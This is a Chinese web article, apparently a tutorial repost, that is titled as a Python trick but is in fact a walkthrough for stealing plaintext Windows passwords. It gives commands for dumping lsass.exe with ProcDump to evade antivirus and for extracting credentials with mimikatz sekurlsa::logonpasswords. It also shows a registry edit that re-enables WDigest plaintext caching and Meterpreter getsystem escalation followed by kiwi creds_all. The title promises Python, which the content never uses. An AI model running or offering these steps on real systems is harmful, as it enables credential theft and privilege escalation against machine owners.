python簡(jiǎn)單直接獲取windows明文密碼操作技巧
01、Procdump+Mimikatz
利用procdump+Mimikatz 繞過(guò)殺軟獲取Windows明文密碼。
(1)工具準(zhǔn)備:
ProcDump:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
mimikatz:
https://github.com/gentilkiwi/mimikatz/
(2)Windows Server 2008 R2提取明文密碼
在目標(biāo)機(jī)器上生成存儲(chǔ)文件:
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
將lsass.dmp復(fù)制到本地,使用mimikatz 一行命令將結(jié)果輸出到文本。
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt
如圖:成功從內(nèi)存中提取明文密碼。
02、Window 2012 R2抓取密碼
在Windows2012系統(tǒng)及以上的系統(tǒng),默認(rèn)在內(nèi)存緩存中禁止保存明文密碼的。攻擊者可以通過(guò)修改注冊(cè)表的方式抓取明文,需要用戶(hù)重新登錄后才能成功抓取。
(1)修改注冊(cè)表
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
(2)用戶(hù)administrator注銷(xiāo)后重新登錄,成功抓取到明文信息。
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt
03、MSF kiwi模塊
使用kiwi模塊需要system權(quán)限,所以我們?cè)谑褂迷撃K之前需要將當(dāng)前MSF中的shell提升為system。
提到system有兩個(gè)方法,一是當(dāng)前的權(quán)限是administrator用戶(hù),二是利用其它手段先提權(quán)到administrator用戶(hù)。然后administrator用戶(hù)可以直接getsystem到system權(quán)限。
meterpreter > getuid Server username: BYPASS-E97BA3FC\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
加載kiwi模塊:
load kiwi
列舉系統(tǒng)中的明文密碼:
creds_all
以上就是python簡(jiǎn)單直接獲取windows明文密碼操作技巧的詳細(xì)內(nèi)容,更多關(guān)于python獲取windows明文密碼的資料請(qǐng)關(guān)注腳本之家其它相關(guān)文章!
相關(guān)文章
python單線程實(shí)現(xiàn)多個(gè)定時(shí)器示例
這篇文章主要介紹了python單線程實(shí)現(xiàn)多個(gè)定時(shí)器示例,需要的朋友可以參考下2014-03-03python3 圖片 4通道轉(zhuǎn)成3通道 1通道轉(zhuǎn)成3通道 圖片壓縮實(shí)例
今天小編就為大家分享一篇python3 圖片 4通道轉(zhuǎn)成3通道 1通道轉(zhuǎn)成3通道 圖片壓縮實(shí)例,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過(guò)來(lái)看看吧2019-12-12在Django的模型中執(zhí)行原始SQL查詢(xún)的方法
這篇文章主要介紹了在Django的模型中執(zhí)行原始SQL查詢(xún)的方法,Django是最具人氣的Python web開(kāi)發(fā)框架,需要的朋友可以參考下2015-07-07python+selenium?實(shí)現(xiàn)掃碼免密登錄示例代碼
這篇文章主要介紹了python+selenium?實(shí)現(xiàn)掃碼免密登錄,首先掃碼登錄獲取cookies保存到本地未后面免密登錄做準(zhǔn)備,本文通過(guò)示例代碼給大家介紹的非常詳細(xì),需要的朋友可以參考下2022-07-07Python使用Beautiful Soup實(shí)現(xiàn)解析網(wǎng)頁(yè)
在這篇文章中,我們將介紹如何使用 Python 編寫(xiě)一個(gè)簡(jiǎn)單的網(wǎng)絡(luò)爬蟲(chóng),以獲取并解析網(wǎng)頁(yè)內(nèi)容。我們將使用 Beautiful Soup 庫(kù),它是一個(gè)非常強(qiáng)大的庫(kù),用于解析和操作 HTML 和 XML 文檔。讓我們開(kāi)始吧2023-05-05python使用在線API查詢(xún)IP對(duì)應(yīng)的地理位置信息實(shí)例
這篇文章主要介紹了python使用在線API查詢(xún)IP對(duì)應(yīng)的地理位置信息實(shí)例,需要的朋友可以參考下2014-06-06python 實(shí)現(xiàn)在一張圖中繪制一個(gè)小的子圖方法
今天小編就為大家分享一篇python 實(shí)現(xiàn)在一張圖中繪制一個(gè)小的子圖方法,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過(guò)來(lái)看看吧2019-07-07Zabbix實(shí)現(xiàn)微信報(bào)警功能
這篇文章主要介紹了Zabbix實(shí)現(xiàn)微信報(bào)警的相關(guān)資料,本文圖文并茂介紹的非常詳細(xì),需要的朋友可以參考下2016-10-10